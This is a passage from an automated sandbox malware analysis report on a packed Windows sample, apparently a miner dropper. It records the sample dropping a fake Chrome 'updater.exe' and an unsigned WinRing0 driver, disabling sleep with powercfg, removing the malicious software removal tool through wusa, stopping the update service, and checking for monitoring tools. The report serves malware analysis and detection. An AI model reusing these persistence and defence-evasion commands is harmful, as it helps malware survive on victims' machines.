                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: TwrhjEKqxk.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: TwrhjEKqxk.exeStatic file information: File size 8538008 > 1048576
                Source: TwrhjEKqxk.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x51a52e
                Source: TwrhjEKqxk.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x2fbe00
                Source: TwrhjEKqxk.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: TwrhjEKqxk.exe, 00000000.00000002.2150017772.00007FF7A0107000.00000040.00000001.01000000.00000003.sdmp, updater.exe, 00000022.00000002.2192775271.00007FF7DA2D7000.00000040.00000001.01000000.00000004.sdmp
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.dr
                Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: TwrhjEKqxk.exe, 00000000.00000002.2150017772.00007FF7A0107000.00000040.00000001.01000000.00000003.sdmp, updater.exe, 00000022.00000002.2192775271.00007FF7DA2D7000.00000040.00000001.01000000.00000004.sdmp
                Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name: .imports
                Source: TwrhjEKqxk.exeStatic PE information: section name: .themida
                Source: TwrhjEKqxk.exeStatic PE information: section name: .boot
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name: .imports
                Source: updater.exe.0.drStatic PE information: section name: .themida
                Source: updater.exe.0.drStatic PE information: section name: .boot
                Source: C:\Windows\System32\conhost.exeCode function: 57_2_0000000140001394 push qword ptr [0000000140009004h]; ret 57_2_0000000140001403
                Source: TwrhjEKqxk.exeStatic PE information: section name: entropy: 7.964649025796498
                Source: updater.exe.0.drStatic PE information: section name: entropy: 7.964649025796498

                Persistence and Installation Behavior

                barindex
                Sample is not signed and drops a device driver
                Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\mnidgyzvuran.sysJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\mnidgyzvuran.sysJump to dropped file
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\mnidgyzvuran.sysJump to dropped file

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
